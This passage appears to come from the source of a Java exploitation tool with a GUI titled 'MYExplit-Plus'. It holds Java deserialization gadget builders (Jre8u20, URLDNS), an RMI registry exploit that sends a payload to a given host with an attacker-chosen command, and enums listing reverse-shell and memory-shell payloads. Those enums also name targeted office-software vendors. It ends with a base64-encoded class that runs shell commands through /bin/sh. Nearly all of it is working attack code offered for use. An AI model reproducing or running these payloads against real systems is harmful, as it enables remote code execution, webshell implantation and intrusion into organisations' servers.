getObject(type,param); 42 | //序列化 43 | ByteArrayOutputStream baous = new ByteArrayOutputStream(); 44 | ObjectOutputStream oos = new ObjectOutputStream(baous); 45 | oos.writeObject(set); 46 | byte[] bytes = baous.toByteArray(); 47 | oos.close(); 48 | 49 | return bytes; 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/Jre8u20.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Gadgets; 2 | 3 | 4 | import com.achuna33.Gadgets.utils.Gadgets; 5 | import com.achuna33.Gadgets.utils.Reflections; 6 | import com.achuna33.Gadgets.utils.Util; 7 | import com.achuna33.SupportType.PayloadType; 8 | 9 | import javax.xml.transform.Templates; 10 | import java.beans.beancontext.BeanContextSupport; 11 | import java.io.*; 12 | import java.lang.reflect.Field; 13 | import java.lang.reflect.InvocationHandler; 14 | import java.util.HashMap; 15 | import java.util.LinkedHashSet; 16 | 17 | public class Jre8u20 { 18 | public static void main(String[] args) throws Exception { 19 | byte[] bytes = getBytes(PayloadType.command, "calc"); 20 | FileOutputStream fous = new FileOutputStream("888.ser"); 21 | fous.write(bytes); 22 | fous.close(); 23 | FileInputStream file = new FileInputStream("888.ser"); 24 | ObjectInputStream obj = new ObjectInputStream(file); 25 | obj.readObject(); 26 | } 27 | 28 | public static byte[] getBytes(PayloadType type, String... param) throws Exception { 29 | final Object templates = Gadgets.createTemplatesImpl(type, param); 30 | String zeroHashCodeStr = "f5a5a608"; 31 | 32 | HashMap map = new HashMap(); 33 | map.put(zeroHashCodeStr, "foo"); 34 | 35 | InvocationHandler handler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map); 36 | Reflections.setFieldValue(handler, "type", Templates.class); 37 | Templates proxy = Gadgets.createProxy(handler, Templates.class); 38 | Reflections.setFieldValue(templates, "_auxClasses", null); 39 | Reflections.setFieldValue(templates, "_class", null); 40 | 41 | map.put(zeroHashCodeStr, templates); // swap in real object 42 | 43 | LinkedHashSet set = new LinkedHashSet(); 44 | 45 | BeanContextSupport bcs = new BeanContextSupport(); 46 | Class cc = Class.forName("java.beans.beancontext.BeanContextSupport"); 47 | Field serializable = cc.getDeclaredField("serializable"); 48 | serializable.setAccessible(true); 49 | serializable.set(bcs, 0); 50 | 51 | Field beanContextChildPeer = cc.getSuperclass().getDeclaredField("beanContextChildPeer"); 52 | beanContextChildPeer.set(bcs, bcs); 53 | 54 | set.add(bcs); 55 | 56 | //序列化 57 | ByteArrayOutputStream baous = new ByteArrayOutputStream(); 58 | ObjectOutputStream oos = new ObjectOutputStream(baous); 59 | 60 | oos.writeObject(set); 61 | oos.writeObject(handler); 62 | oos.writeObject(templates); 63 | oos.writeObject(proxy); 64 | oos.close(); 65 | 66 | byte[] bytes = baous.toByteArray(); 67 | bytes[89] = 3; //修改hashset的长度(元素个数) 68 | 69 | //调整 TC_ENDBLOCKDATA 标记的位置 70 | //0x73 = 115, 0x78 = 120 71 | //0x73 for TC_OBJECT, 0x78 for TC_ENDBLOCKDATA 72 | for(int i = 0; i < bytes.length; i++){ 73 | if(bytes[i] == 0 && bytes[i+1] == 0 && bytes[i+2] == 0 & bytes[i+3] == 0 && 74 | bytes[i+4] == 120 && bytes[i+5] == 120 && bytes[i+6] == 115){ 75 | bytes = Util.deleteAt(bytes, i + 5); 76 | break; 77 | } 78 | } 79 | 80 | 81 | //将 serializable 的值修改为 1 82 | //0x73 = 115, 0x78 = 120 83 | //0x73 for TC_OBJECT, 0x78 for TC_ENDBLOCKDATA 84 | for(int i = 0; i < bytes.length; i++){ 85 | if(bytes[i] == 120 && bytes[i+1] == 0 && bytes[i+2] == 1 && bytes[i+3] == 0 && 86 | bytes[i+4] == 0 && bytes[i+5] == 0 && bytes[i+6] == 0 && bytes[i+7] == 115){ 87 | bytes[i+6] = 1; 88 | break; 89 | } 90 | } 91 | 92 | /** 93 | TC_BLOCKDATA - 0x77 94 | Length - 4 - 0x04 95 | Contents - 0x00000000 96 | TC_ENDBLOCKDATA - 0x78 97 | **/ 98 | 99 | //把这部分内容先删除,再附加到 AnnotationInvocationHandler 之后 100 | //目的是让 AnnotationInvocationHandler 变成 BeanContextSupport 的数据流 101 | //0x77 = 119, 0x78 = 120 102 | //0x77 for TC_BLOCKDATA, 0x78 for TC_ENDBLOCKDATA 103 | for(int i = 0; i < bytes.length; i++){ 104 | if(bytes[i] == 119 && bytes[i+1] == 4 && bytes[i+2] == 0 && bytes[i+3] == 0 && 105 | bytes[i+4] == 0 && bytes[i+5] == 0 && bytes[i+6] == 120){ 106 | bytes = Util.deleteAt(bytes, i); 107 | bytes = Util.deleteAt(bytes, i); 108 | bytes = Util.deleteAt(bytes, i); 109 | bytes = Util.deleteAt(bytes, i); 110 | bytes = Util.deleteAt(bytes, i); 111 | bytes = Util.deleteAt(bytes, i); 112 | bytes = Util.deleteAt(bytes, i); 113 | break; 114 | } 115 | } 116 | 117 | /* 118 | serialVersionUID - 0x00 00 00 00 00 00 00 00 119 | newHandle 0x00 7e 00 28 120 | classDescFlags - 0x00 - 121 | fieldCount - 0 - 0x00 00 122 | classAnnotations 123 | TC_ENDBLOCKDATA - 0x78 124 | superClassDesc 125 | TC_NULL - 0x70 126 | newHandle 0x00 7e 00 29 127 | */ 128 | //0x78 = 120, 0x70 = 112 129 | //0x78 for TC_ENDBLOCKDATA, 0x70 for TC_NULL 130 | for(int i = 0; i < bytes.length; i++){ 131 | if(bytes[i] == 0 && bytes[i+1] == 0 && bytes[i+2] == 0 && bytes[i+3] == 0 && 132 | bytes[i + 4] == 0 && bytes[i+5] == 0 && bytes[i+6] == 0 && bytes[i+7] == 0 && 133 | bytes[i+8] == 0 && bytes[i+9] == 0 && bytes[i+10] == 0 && bytes[i+11] == 120 && 134 | bytes[i+12] == 112){ 135 | i = i + 13; 136 | bytes = Util.addAtIndex(bytes, i++, (byte) 0x77); 137 | bytes = Util.addAtIndex(bytes, i++, (byte) 0x04); 138 | bytes = Util.addAtIndex(bytes, i++, (byte) 0x00); 139 | bytes = Util.addAtIndex(bytes, i++, (byte) 0x00); 140 | bytes = Util.addAtIndex(bytes, i++, (byte) 0x00); 141 | bytes = Util.addAtIndex(bytes, i++, (byte) 0x00); 142 | bytes = Util.addAtIndex(bytes, i++, (byte) 0x78); 143 | break; 144 | } 145 | } 146 | 147 | //将 sun.reflect.annotation.AnnotationInvocationHandler 的 classDescFlags 由 SC_SERIALIZABLE 修改为 SC_SERIALIZABLE | SC_WRITE_METHOD 148 | //这一步其实不是通过理论推算出来的,是通过debug 以及查看 pwntester的 poc 发现需要这么改 149 | //原因是如果不设置 SC_WRITE_METHOD 标志的话 defaultDataEnd = true,导致 BeanContextSupport -> deserialize(ois, bcmListeners = new ArrayList(1)) 150 | // -> count = ois.readInt(); 报错,无法完成整个反序列化流程 151 | // 没有 SC_WRITE_METHOD 标记,认为这个反序列流到此就结束了 152 | // 标记: 7375 6e2e 7265 666c 6563 --> sun.reflect... 153 | for(int i = 0; i < bytes.length; i++){ 154 | if(bytes[i] == 115 && bytes[i+1] == 117 && bytes[i+2] == 110 && bytes[i+3] == 46 && 155 | bytes[i + 4] == 114 && bytes[i+5] == 101 && bytes[i+6] == 102 && bytes[i+7] == 108 ){ 156 | i = i + 58; 157 | bytes[i] = 3; 158 | break; 159 | } 160 | } 161 | 162 | //加回之前删除的 TC_BLOCKDATA,表明 HashSet 到此结束 163 | bytes = Util.addAtLast(bytes, (byte) 0x78); 164 | 165 | return bytes; 166 | } 167 | } 168 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/RMIRegistryExploitJdk8u231.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Gadgets; 2 | import com.achuna33.Gadgets.utils.ExecCheckingSecurityManager; 3 | import com.achuna33.Gadgets.utils.Reflections; 4 | import sun.rmi.transport.StreamRemoteCall; 5 | 6 | 7 | import javax.net.ssl.SSLContext; 8 | import javax.net.ssl.SSLSocketFactory; 9 | import javax.net.ssl.TrustManager; 10 | import javax.net.ssl.X509TrustManager; 11 | import java.io.IOException; 12 | import java.io.ObjectOutput; 13 | import java.net.Socket; 14 | import java.rmi.*; 15 | import java.rmi.registry.LocateRegistry; 16 | import java.rmi.registry.Registry; 17 | import java.rmi.server.Operation; 18 | import java.rmi.server.RMIClientSocketFactory; 19 | import java.rmi.server.RemoteRef; 20 | import java.security.cert.X509Certificate; 21 | import java.util.concurrent.Callable; 22 | 23 | 24 | @SuppressWarnings({"rawtypes", "unchecked"}) 25 | public class RMIRegistryExploitJdk8u231 { 26 | private static class TrustAllSSL implements X509TrustManager { 27 | private static final X509Certificate[] ANY_CA = {}; 28 | public X509Certificate[] getAcceptedIssuers() { return ANY_CA; } 29 | public void checkServerTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ } 30 | public void checkClientTrusted(final X509Certificate[] c, final String t) { /* Do nothing/accept all */ } 31 | } 32 | 33 | private static class RMISSLClientSocketFactory implements RMIClientSocketFactory { 34 | public Socket createSocket(String host, int port) throws IOException { 35 | try { 36 | SSLContext ctx = SSLContext.getInstance("TLS"); 37 | ctx.init(null, new TrustManager[] {new TrustAllSSL()}, null); 38 | SSLSocketFactory factory = ctx.getSocketFactory(); 39 | return factory.createSocket(host, port); 40 | } catch(Exception e) { 41 | throw new IOException(e); 42 | } 43 | } 44 | } 45 | 46 | public static void main(final String[] args) throws Exception { 47 | if ( args.length < 3 ) { 48 | 49 | System.exit(-1); 50 | return; 51 | } 52 | final String host = args[0]; 53 | final int port = Integer.parseInt(args[1]); 54 | final String gadget = "JRMPClient2"; 55 | final String command = args[2]; 56 | 57 | 58 | Registry registry = LocateRegistry.getRegistry(host, port); 59 | final String className = RMIRegistryExploitJdk8u231.class.getPackage().getName() + "." + gadget; 60 | System.out.println(className); 61 | final Class payloadClass = (Class) Class.forName(className); 62 | 63 | // test RMI registry connection and upgrade to SSL connection on fail 64 | try { 65 | registry.list(); 66 | } catch(ConnectIOException ex) { 67 | registry = LocateRegistry.getRegistry(host, port, new RMISSLClientSocketFactory()); 68 | } 69 | 70 | // ensure payload doesn't detonate during construction or deserialization 71 | exploit(registry, payloadClass, command); 72 | System.exit(0);//不知为何,不加这个语句,程序不会主动退出。 73 | } 74 | 75 | public static void exploit(final Registry registry, 76 | final Class payloadClass, 77 | final String command) throws Exception { 78 | new ExecCheckingSecurityManager().callWrapped(new Callable(){public Void call() throws Exception { 79 | 80 | Object payload =new JRMPClient2().getObject(command); 81 | String name = "pwned" + System.nanoTime(); 82 | // String name = "pwned"; 83 | //Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap(name, payload), Remote.class); 84 | Remote remote = (Remote) payload;//直接使用JRMPClient2生成的对象,不要包装map了 85 | try { 86 | // registry.bind(name,remote); 87 | // bind(registry,name,remote);//经过改造的bind,但是依然受远程IP限制,还是需要使用lookup 88 | lookup(registry,remote); 89 | } catch (Throwable e) { 90 | e.printStackTrace(); 91 | } 92 | //Utils.releasePayload(payloadObj, payload); 93 | return null; 94 | }}); 95 | } 96 | 97 | /*经过改造的bind函数 98 | 将enableReplace属性改为了false 99 | */ 100 | public static void bind(Registry registry,String var1, Remote var2) throws AccessException, AlreadyBoundException, RemoteException { 101 | try { 102 | Operation[] operations = new Operation[]{new Operation("void bind(java.lang.String, java.rmi.Remote)"), new Operation("java.lang.String list()[]"), new Operation("java.rmi.Remote lookup(java.lang.String)"), new Operation("void rebind(java.lang.String, java.rmi.Remote)"), new Operation("void unbind(java.lang.String)")}; 103 | 104 | RemoteRef ref = (RemoteRef) Reflections.getFieldValue(registry,"ref"); 105 | StreamRemoteCall var3 = (StreamRemoteCall)ref.newCall((java.rmi.server.RemoteObject)registry, operations, 0, 4905912898345647071L); 106 | 107 | try { 108 | ObjectOutput var4 = var3.getOutputStream(); 109 | Reflections.setFieldValue(var4,"enableReplace",false); 110 | var4.writeObject(var1); 111 | var4.writeObject(var2); 112 | } catch (IOException var5) { 113 | throw new MarshalException("error marshalling arguments", var5); 114 | } 115 | 116 | ref.invoke(var3); 117 | ref.done(var3); 118 | } catch (RuntimeException var6) { 119 | throw var6; 120 | } catch (RemoteException var7) { 121 | throw var7; 122 | } catch (AlreadyBoundException var8) { 123 | throw var8; 124 | } catch (Exception var9) { 125 | throw new UnexpectedException("undeclared checked exception", var9); 126 | } 127 | } 128 | 129 | /*经过改造的lookup函数 130 | 将enableReplace属性改为了false 131 | */ 132 | public static void lookup(Registry registry,Remote var1) throws AccessException, AlreadyBoundException, RemoteException { 133 | try { 134 | Operation[] operations = new Operation[]{new Operation("void bind(java.lang.String, java.rmi.Remote)"), new Operation("java.lang.String list()[]"), new Operation("java.rmi.Remote lookup(java.lang.String)"), new Operation("void rebind(java.lang.String, java.rmi.Remote)"), new Operation("void unbind(java.lang.String)")}; 135 | 136 | RemoteRef ref = (RemoteRef) Reflections.getFieldValue(registry,"ref"); 137 | StreamRemoteCall var3 = (StreamRemoteCall)ref.newCall((java.rmi.server.RemoteObject)registry, operations, 2, 4905912898345647071L); 138 | 139 | try { 140 | ObjectOutput var4 = var3.getOutputStream(); 141 | Reflections.setFieldValue(var4,"enableReplace",false); 142 | var4.writeObject(var1); 143 | } catch (IOException var5) { 144 | throw new MarshalException("error marshalling arguments", var5); 145 | } 146 | 147 | ref.invoke(var3); 148 | ref.done(var3); 149 | } catch (RuntimeException var6) { 150 | throw var6; 151 | } catch (RemoteException var7) { 152 | throw var7; 153 | } catch (AlreadyBoundException var8) { 154 | throw var8; 155 | } catch (Exception var9) { 156 | throw new UnexpectedException("undeclared checked exception", var9); 157 | } 158 | } 159 | } 160 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/URLDNS.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Gadgets; 2 | 3 | 4 | import com.achuna33.Gadgets.utils.Reflections; 5 | 6 | import java.io.ByteArrayOutputStream; 7 | import java.io.IOException; 8 | import java.io.ObjectOutputStream; 9 | import java.net.InetAddress; 10 | import java.net.URL; 11 | import java.net.URLConnection; 12 | import java.net.URLStreamHandler; 13 | import java.util.HashMap; 14 | 15 | public class URLDNS { 16 | 17 | public static Object getObject(final String url) throws Exception{ 18 | //Avoid DNS resolution during payload creation 19 | //Since the field java.net.URL.handler is transient, it will not be part of the serialized payload. 20 | URLStreamHandler handler = new SilentURLStreamHandler(); 21 | 22 | HashMap ht = new HashMap(); // HashMap that will contain the URL 23 | URL u = new URL(null, url, handler); // URL to use as the Key 24 | ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup. 25 | 26 | Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered. 27 | return ht; 28 | } 29 | public static byte[] getBytes(final String url) throws Exception { 30 | Object ht = getObject(url); 31 | 32 | ByteArrayOutputStream baous = new ByteArrayOutputStream(); 33 | ObjectOutputStream oos = new ObjectOutputStream(baous); 34 | oos.writeObject(ht); 35 | byte[] bytes = baous.toByteArray(); 36 | oos.close(); 37 | 38 | return bytes; 39 | } 40 | 41 | 42 | static class SilentURLStreamHandler extends URLStreamHandler { 43 | 44 | protected URLConnection openConnection(URL u) throws IOException { 45 | return null; 46 | } 47 | 48 | protected synchronized InetAddress getHostAddress(URL u) { 49 | return null; 50 | } 51 | } 52 | } 53 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/utils/ClassFiles.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Gadgets.utils; 2 | 3 | import java.io.ByteArrayOutputStream; 4 | import java.io.IOException; 5 | import java.io.InputStream; 6 | 7 | public class ClassFiles { 8 | public static String classAsFile(final Class clazz) { 9 | return classAsFile(clazz, true); 10 | } 11 | 12 | public static String classAsFile(final Class clazz, boolean suffix) { 13 | String str; 14 | if (clazz.getEnclosingClass() == null) { 15 | str = clazz.getName().replace(".", "/"); 16 | } else { 17 | str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName(); 18 | } 19 | if (suffix) { 20 | str += ".class"; 21 | } 22 | return str; 23 | } 24 | 25 | public static byte[] classAsBytes(final Class clazz) { 26 | try { 27 | final byte[] buffer = new byte[1024]; 28 | final String file = classAsFile(clazz); 29 | final InputStream in = ClassFiles.class.getClassLoader().getResourceAsStream(file); 30 | if (in == null) { 31 | throw new IOException("couldn't find '" + file + "'"); 32 | } 33 | final ByteArrayOutputStream out = new ByteArrayOutputStream(); 34 | int len; 35 | while ((len = in.read(buffer)) != -1) { 36 | out.write(buffer, 0, len); 37 | } 38 | return out.toByteArray(); 39 | } catch (IOException e) { 40 | throw new RuntimeException(e); 41 | } 42 | } 43 | 44 | } 45 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/utils/ExecCheckingSecurityManager.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Gadgets.utils; 2 | 3 | 4 | import java.security.Permission; 5 | import java.util.Collections; 6 | import java.util.LinkedList; 7 | import java.util.List; 8 | import java.util.concurrent.Callable; 9 | 10 | // TODO per-thread secmgr 11 | public class ExecCheckingSecurityManager extends SecurityManager { 12 | public ExecCheckingSecurityManager() { 13 | this(true); 14 | } 15 | 16 | public ExecCheckingSecurityManager(boolean throwException) { 17 | this.throwException = throwException; 18 | } 19 | 20 | private final boolean throwException; 21 | 22 | private final List cmds = new LinkedList(); 23 | 24 | public List getCmds() { 25 | return Collections.unmodifiableList(cmds); 26 | } 27 | 28 | @Override 29 | public void checkPermission(final Permission perm) { } 30 | 31 | @Override 32 | public void checkPermission(final Permission perm, final Object context) { } 33 | 34 | @Override 35 | public void checkExec(final String cmd) { 36 | super.checkExec(cmd); 37 | 38 | cmds.add(cmd); 39 | 40 | if (throwException) { 41 | // throw a special exception to ensure we can detect exec() in the test 42 | throw new ExecException(cmd); 43 | } 44 | }; 45 | 46 | @SuppressWarnings("serial") 47 | public static class ExecException extends RuntimeException { 48 | private final String threadName = Thread.currentThread().getName(); 49 | private final String cmd; 50 | public ExecException(String cmd) { this.cmd = cmd; } 51 | public String getCmd() { return cmd; } 52 | public String getThreadName() { return threadName; } 53 | @ 54 | Override 55 | public String getMessage() { 56 | return "executed `" + getCmd() + "` in [" + getThreadName() + "]"; 57 | } 58 | } 59 | 60 | public void callWrapped(final Runnable runnable) throws Exception { 61 | callWrapped(new Callable(){ 62 | public Void call() throws Exception { 63 | runnable.run(); 64 | return null; 65 | } 66 | }); 67 | } 68 | 69 | public T callWrapped(final Callable callable) throws Exception { 70 | SecurityManager sm = System.getSecurityManager(); // save sm 71 | System.setSecurityManager(this); 72 | try { 73 | T result = callable.call(); 74 | if (throwException && ! getCmds().isEmpty()) { 75 | throw new ExecException(getCmds().get(0)); 76 | } 77 | return result; 78 | } catch (Exception e) { 79 | if (! (e instanceof ExecException) && throwException && ! getCmds().isEmpty()) { 80 | throw new ExecException(getCmds().get(0)); 81 | } else { 82 | throw e; 83 | } 84 | } finally { 85 | System.setSecurityManager(sm); // restore sm 86 | } 87 | } 88 | } 89 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/utils/Reflections.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Gadgets.utils; 2 | 3 | import com.nqzero.permit.Permit; 4 | import sun.reflect.ReflectionFactory; 5 | import java.lang.reflect.AccessibleObject; 6 | import java.lang.reflect.Constructor; 7 | import java.lang.reflect.Field; 8 | import java.lang.reflect.InvocationTargetException; 9 | 10 | @SuppressWarnings ( "restriction" ) 11 | public class Reflections { 12 | 13 | public static void setAccessible(AccessibleObject member) { 14 | // quiet runtime warnings from JDK9+ 15 | Permit.setAccessible(member); 16 | } 17 | 18 | public static Field getField(final Class clazz, final String fieldName) { 19 | Field field = null; 20 | try { 21 | field = clazz.getDeclaredField(fieldName); 22 | setAccessible(field); 23 | } 24 | catch (NoSuchFieldException ex) { 25 | if (clazz.getSuperclass() != null) 26 | field = getField(clazz.getSuperclass(), fieldName); 27 | } 28 | return field; 29 | } 30 | 31 | public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { 32 | final Field field = getField(obj.getClass(), fieldName); 33 | field.set(obj, value); 34 | } 35 | 36 | public static Object getFieldValue(final Object obj, final String fieldName) throws Exception { 37 | final Field field = getField(obj.getClass(), fieldName); 38 | return field.get(obj); 39 | } 40 | 41 | public static Constructor getFirstCtor(final String name) throws Exception { 42 | final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0]; 43 | setAccessible(ctor); 44 | return ctor; 45 | } 46 | 47 | public static Object newInstance(String className, Object ... args) throws Exception { 48 | return getFirstCtor(className).newInstance(args); 49 | } 50 | 51 | public static T createWithoutConstructor ( Class classToInstantiate ) 52 | throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { 53 | return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]); 54 | } 55 | 56 | @SuppressWarnings ( {"unchecked"} ) 57 | public static T createWithConstructor ( Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs ) 58 | throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { 59 | Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); 60 | setAccessible(objCons); 61 | Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); 62 | setAccessible(sc); 63 | return (T)sc.newInstance(consArgs); 64 | } 65 | 66 | } -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Gadgets/utils/Util.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Gadgets.utils; 2 | 3 | public class Util { 4 | public static byte[] deleteAt(byte[] bs, int index) { 5 | int length = bs.length - 1; 6 | byte[] ret = new byte[length]; 7 | 8 | if(index == bs.length - 1) { 9 | System.arraycopy(bs, 0, ret, 0, length); 10 | } else if(index < bs.length - 1) { 11 | for(int i = index; i < length; i++) { 12 | bs[i] = bs[i + 1]; 13 | } 14 | 15 | System.arraycopy(bs, 0, ret, 0, length); 16 | } 17 | 18 | return ret; 19 | } 20 | 21 | public static byte[] addAtIndex(byte[] bs, int index, byte b) { 22 | int length = bs.length + 1; 23 | byte[] ret = new byte[length]; 24 | 25 | System.arraycopy(bs, 0, ret, 0, index); 26 | ret[index] = b; 27 | System.arraycopy(bs, index, ret, index + 1, length - index - 1); 28 | 29 | return ret; 30 | } 31 | 32 | public static byte[] addAtLast(byte[] bs, byte b) { 33 | int length = bs.length + 1; 34 | byte[] ret = new byte[length]; 35 | 36 | System.arraycopy(bs, 0, ret, 0, length-1); 37 | ret[length - 1] = b; 38 | 39 | return ret; 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/MainApplication.java: -------------------------------------------------------------------------------- 1 | package com.achuna33; 2 | 3 | import javafx.application.Application; 4 | import javafx.fxml.FXMLLoader; 5 | import javafx.scene.Parent; 6 | import javafx.scene.Scene; 7 | import javafx.stage.Stage; 8 | 9 | import javafx.scene.image.Image; 10 | 11 | public class MainApplication extends Application{ 12 | @Override 13 | public void start(Stage primaryStage) throws Exception{ 14 | System.setProperty("sun.net.client.defaultConnectTimeout", "30000"); 15 | Parent root = (Parent)FXMLLoader.load(this.getClass().getResource("/gui.fxml")); 16 | primaryStage.setTitle("MYExplit-Plus"); 17 | primaryStage.getIcons().add(new Image("avatar.jpg")); 18 | Scene scene = new Scene(root); 19 | primaryStage.setScene(scene); 20 | primaryStage.show(); 21 | } 22 | public static void main(String[] args) { 23 | launch(args); 24 | } 25 | } 26 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/SupportType/GadgetType.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.SupportType; 2 | 3 | public enum GadgetType { 4 | urldns, 5 | commonsbeanutils1, 6 | commonsbeanutils2, 7 | commonscollectionsk1, 8 | commonscollectionsk2, 9 | jdk7u21, 10 | jre8u20, 11 | c3p0, 12 | } 13 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/SupportType/MyDIYType.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.SupportType; 2 | 3 | public enum MyDIYType { 4 | PutFile, 5 | commandecho; 6 | } 7 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/SupportType/PayloadType.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.SupportType; 2 | 3 | public enum PayloadType { 4 | command, 5 | dnslog, 6 | reverseshell, 7 | tomcatecho, 8 | springecho, 9 | weblogicecho, 10 | tomcatmemshell1, 11 | tomcatmemshell2, 12 | weblogicmemshell1, 13 | weblogicmemshell2, 14 | jettymemshell, 15 | jbossmemshell, 16 | webspherememshell, 17 | putfile, 18 | commandecho, 19 | myclass, 20 | springmemshell, 21 | springmemshell2, 22 | nettymeshell; 23 | 24 | } 25 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/SupportType/Poc_Exp.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.SupportType; 2 | 3 | public enum Poc_Exp { 4 | POC, 5 | EXP 6 | } 7 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/SupportType/SupportType.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.SupportType; 2 | 3 | public enum SupportType { 4 | Seeyon, 5 | Weaver, 6 | yongyon, 7 | TD, 8 | wanhu, 9 | Landray, 10 | } 11 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/SupportType/SupportVul.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.SupportType; 2 | 3 | public enum SupportVul { 4 | Serial, 5 | Jndi, 6 | UploadFile, 7 | RuntimeExec, 8 | SPEL, 9 | 信息泄露, 10 | SQLInjection 11 | } 12 | -------------------------------------------------------------------------------- /src/main/java/com/achuna33/Templates/CommandEchoTemplate.java: -------------------------------------------------------------------------------- 1 | package com.achuna33.Templates; 2 | 3 | import com.achuna33.SupportType.MyDIYType; 4 | import com.achuna33.Utils.ASMChanger; 5 | import com.achuna33.Utils.Cache; 6 | import com.achuna33.Utils.Utils; 7 | import org.objectweb.asm.ClassReader; 8 | 9 | import org.objectweb.asm.ClassWriter; 10 | 11 | import javax.xml.bind.DatatypeConverter; 12 | import java.io.FileOutputStream; 13 | import java.io.IOException; 14 | import static org.objectweb.asm.Opcodes.ASM6; 15 | 16 | 17 | public class CommandEchoTemplate implements Template{ 18 | private String className; 19 | private byte[] bytes; 20 | private String uri; 21 | private String cmd; 22 | public CommandEchoTemplate(String uri,String cmd){ 23 | this.uri = new String(Utils.Base64DecodeStr2bytes(uri)); 24 | this.className = "ExecuteCmd"; 25 | this.cmd = new String(Utils.Base64DecodeStr2bytes(cmd)); 26 | generate(); 27 | } 28 | public void cache(){ 29 | Cache.set(className, bytes); 30 | } 31 | public String getClassName(){ 32 | return className; 33 | } 34 | public byte[] getBytes(){ 35 | return bytes; 36 | } 37 | public void generate() { 38 | String WriteFileClassBase64 = "yv66vgAAADIBFwoAVgB5BwB6CgACAHkJAFUAewoAAgB8CAB9CgACAH4KAH8AgAkAgQCCCACDCgAMAIQHAIUIAIYIAIcIAFcIAIgKAH8AiQcAigcAiwoAjACNCgATAI4KABIAjwoAEgCQCQCRAJIKAJMAlAgAlQoAEgCWCgCMAJcHAJgKAB0AmQoAkwCaCgAMAJsKAFUAnAcAnQoAIgCZBwCeCQBVAJ8KACQAoAoAJAChBwCiCgAoAKMKACgApAgApQoAKACmCACnCACoCgAoAKkHAKoHAKsKACgArAoAMQCtCgAwAK0KAAwArgoAVQCvCgAwALAKADAAsQoAMACWCgAoAI0IALIKABMAswoAKAC0BwC1CgA+AJkIALYIALcKAEMAuAcAuQoAQwC6CgC7ALwHAL0KALsAvgoARgC/CADABwDBCgBDAMIKAMMAvAoAwwDECADFCQDGAMcJAMgAxwoAxgDJCgDIAMoIAMsKAEMAzAcAzQcAzgEAA2NtZAEAEkxqYXZhL2xhbmcvU3RyaW5nOwEAA3VyaQEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAA1TdGFja01hcFRhYmxlBwDNBwDPBwDQBwDRBwCKBwB6BwCFBwCYBwCdAQAIUE9TVERBVEEBABUoTGphdmEvbGFuZy9TdHJpbmc7KVYHAJ4HAKIHAKoHALUBABVCYXNlNjRFbmNvZGVieXRlczJTdHIBABYoW0IpTGphdmEvbGFuZy9TdHJpbmc7BwC5BwC1AQAJdHJhbnNmb3JtAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACkV4Y2VwdGlvbnMHANIBAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAApTb3VyY2VGaWxlAQAPRXhlY3V0ZUNtZC5qYXZhDABaAFsBABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgwAVwBYDADTANQBAAEgDADVANYHAM8MANcA2AcA2QwA2gBYAQABLwwA2wDcAQAQamF2YS9sYW5nL1N0cmluZwEABy9iaW4vc2gBAAItYwEAAi9DDADdAN4BABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyAQAZamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcgcA0QwA3wDgDABaAOEMAFoA4gwA4wDWBwDkDADlAOYHAOcMAOgAaQEAAQoMAOkA